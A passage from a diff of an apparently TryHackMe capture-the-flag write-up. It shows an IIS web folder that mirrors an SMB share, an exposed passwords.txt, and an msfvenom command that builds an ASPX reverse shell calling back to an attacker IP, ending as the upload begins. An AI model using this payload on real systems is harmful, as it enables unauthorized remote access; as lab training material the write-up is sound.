hurtfulclub/thm_writeups/Relevant.md

 As expected the other 2 ports don't resolve.

 The image takes us to the same link as the last image and other than the port, it looks identical to the page on port 80.
-Let's maybe try to enumerate subdirectories of this domain with the new port.
+Let's try to enumerate subdirectories with the new port.

-This took extremely long.
-I think there is something wrong with the box.
-It freezes extremely easily and only responds when rebooted.
-Good news is we found a subdirectory that is the same as our SMB share /nt4wrksv.
-When we visit it we get an empty page.
-I would normally enumerate this subdirectory again but since this is the same name as our SMB share maybe it's accessing the same directory.
-Let's see if we can access the passwords.txt file from browser.
-We can!
-This means if we can upload files we should also be able to access them through here, which means we can possibly get a rev shell.
-Let's generate and upload a rev shell.
+This box is extremely slow and freezes often, requiring reboots.
+I found a subdirectory matching the SMB share (/nt4wrksv) that loads an empty page.
+Since it may access the same directory, I checked for passwords.txt via the browser—and it worked.
+If I can upload files, I might get a reverse shell.
+Time to generate and upload one.

 ```bash
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.21.101.68 LPORT=4444 -f aspx -o rev.aspx
 ```

 Generated a rev shell with MSFVenom.
-We know it's a windows server using IIS, we should maybe be able to use aspx, asp, or php.
-Let's try aspx first.
-Uploading this with the smbclient and accessing this through the web server.
-Also setting up an nc listener on port 444.
+We know it's a windows server using IIS, we should maybe be able to use aspx, asp, or php.Uploading this with the smbclient and accessing this through the web server.
+Setting up an nc listener on port 444.

 ```bash
 smbclient //10.10.219.157/nt4wrksv